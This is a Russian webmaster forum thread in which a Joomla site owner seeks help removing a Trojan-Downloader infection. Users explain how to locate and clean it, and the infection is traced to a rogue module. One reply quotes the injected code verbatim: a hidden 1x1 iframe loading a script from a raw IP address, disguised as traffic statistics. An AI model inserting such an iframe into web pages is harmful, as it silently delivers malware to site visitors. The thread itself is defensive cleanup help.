- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Здравствуйте, не так давно зашёл на свой сайт и обнаружил вирус xttp://61.155.8.157/iframe/wp-stats.php Trojan-Downloader.HTML.Agent.is
Попробывал найти код, но безуспешно, не получается...
Кто силён в этом деле пожалуйста подскажите как можно найти код?
спасибо
двиг Joomla
Ну во первых сделайте ссылку некликабельной или надо сразу предупреждать людей, чтобы в нее не тыкали.
А во-вторых урл пострадавшего в студию
Здравствуйте, не так давно зашёл на свой сайт и обнаружил вирус xttp://61.155.8.157/iframe/wp-stats.php Trojan-Downloader.HTML.Agent.is
Попробывал найти код, но безуспешно, не получается...
Кто силён в этом деле пожалуйста подскажите как можно найти код?
спасибо
двиг Joomla
Adware, где-то засветили параметры доступа (FTP или что у вас там), "Попробывал найти код, но безуспешно" - плохо искали, или вообще не искали, грепните код на javascript, обычно они делают шифрованный код, дешифрование жаваскриптом. сделайте в браузере "Просмотр HTML кода" , когда найдете, гдепайте все исходники на разные части этого джаваскрипта. Имел неосторожность заразить подобным правительственный портал, поищите внимательнее во всех исходниках, обычно такое прячут в тех местах до которых вы е скролите редактором (очень далеко справа), внимательнее надо быть.
fima32 +1
урл в студию
на всякий случай, сам код имеет примерно такой вот вид (недавно у своего клиента вычищал):
<!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
🚬
Такой вирус обычно забирается в файлы с расширением .php, чаще всего в index.php. Проверьте первым делом их. Если не нашли, то выкачивайте все файлы себе и локально с помощью Avsearch'a например ищите в файлах фразу "iframe".
P.S.: после того, как почистите все файлы, обязательно меняйте пароль на фтп и проверяйте свой компьютер на всякие вирусы, тройны и спайваре.
P.S.: после того, как почистите все файлы, обязательно меняйте пароль на фтп и проверяйте свой компьютер на всякие вирусы, тройны и спайваре.
Я думаю, надо сначала найти у себя вирусы, а потом только менять пароли к фтп, иначе опять упрут.
Согласен с Firma32 - надо сначала у себя вирусы найти, у меня такое тоже было. надо также нормальный антивирус поставить. Тоже был прикол с вирусом в index файлах. у меня KIS стоит так он эти файлы сразу видит. код приблизительно такой был - <!--iframe-->длинный код</frame>. и так в каждом php и html файлах.
Кстати вспомнил, откуда взялся тот код у клиетна - в Джумле был установленн левый модуль, который и выводил этот код Зайдите в раздел "Модули", и посмотрите, какой модуль был добавлен последним по дате.
Кстати вспомнил, откуда взялся тот код у клиетна - в Джумле был установленн левый модуль, который и выводил этот код Зайдите в раздел "Модули", и посмотрите, какой модуль был добавлен последним по дате.
большое спасибо, действительно нашёл этот заражённый модуль удалил и больше каспер не орёт:)
Почему так долго не отвечал? хочу сказать модератору Коля Дубр публичное ИДИ ТЫ #### или стучи в icq 214215609 за ОЧЕНЬ обидное оскорбление в отзыве и бан на неделю
Я если у меня сайт хакера ламают ставлю схдники на проверку антивирусу. Он сам убирает все вредоносные скрипты